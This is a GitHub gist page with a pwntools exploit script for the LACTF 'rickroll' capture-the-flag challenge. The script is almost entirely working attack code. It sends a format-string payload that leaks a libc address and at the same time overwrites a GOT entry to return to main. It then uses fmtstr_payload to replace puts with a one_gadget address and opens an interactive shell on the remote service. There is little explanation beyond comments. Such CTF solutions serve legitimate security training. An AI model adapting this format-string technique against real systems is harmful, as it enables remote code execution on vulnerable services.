Skip to content

Instantly share code, notes, and snippets.

@xct

xct/solve.py Secret

Last active February 11, 2023 15:21
Show Gist options
  • Save xct/0be84416307b66168f050cb9da64c5c4 to your computer and use it in GitHub Desktop.
Save xct/0be84416307b66168f050cb9da64c5c4 to your computer and use it in GitHub Desktop.
LACTF rickroll (format string, leak + overwrite at the same time)
from pwn import *
import binascii
context.clear(arch = 'amd64')
context.terminal = ['alacritty', '-e', 'zsh', '-c']
# gdb hack
def _new_binary():
return "gdb-gef"
gdb.binary = _new_binary
base = 0x400000
ret_main = 0x117d
p = remote('lac.tf',31135, level='debug')
#p = process("./rickroll", level="debug")
libc = ELF("./libc/libc.so.6")
#gdb.attach(p, f'''
#break *{base+0x117d}
#continue
#''')
# Find Offset
#buf += b"AAAABBBB%6$p"
buf = b""
payload = b"%39$paaa" # leak libc
# %[value]c%[index]$[write_type][padding][address] (\x7d\x11 = 4477)
payload += "%{}c%{}${}{}{}".format(4477-0x11,9,"hn","aaaab","\x18\x40\x40\x00\x00\x00\x00\x00").encode() # iffset required to amount for prefix
print(payload)
buf += payload
p.recvuntil("Lyrics:")
p.sendline(buf)
p.recvline()
leak = p.recv(41)[-12:]
leak = int(leak,16)
print(f"Leak: {hex(leak)}")
base_offset = 0x23D0A
one_gadget = 0xc9620
base = leak - base_offset
print(f"Base: {hex(base)}")
buf = b""
buf += fmtstr_payload(7, {0x404028: base+one_gadget}) # overwrite puts
p.recvuntil("Lyrics: ")
p.sendline(buf)
p.interactive()
p.close()
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment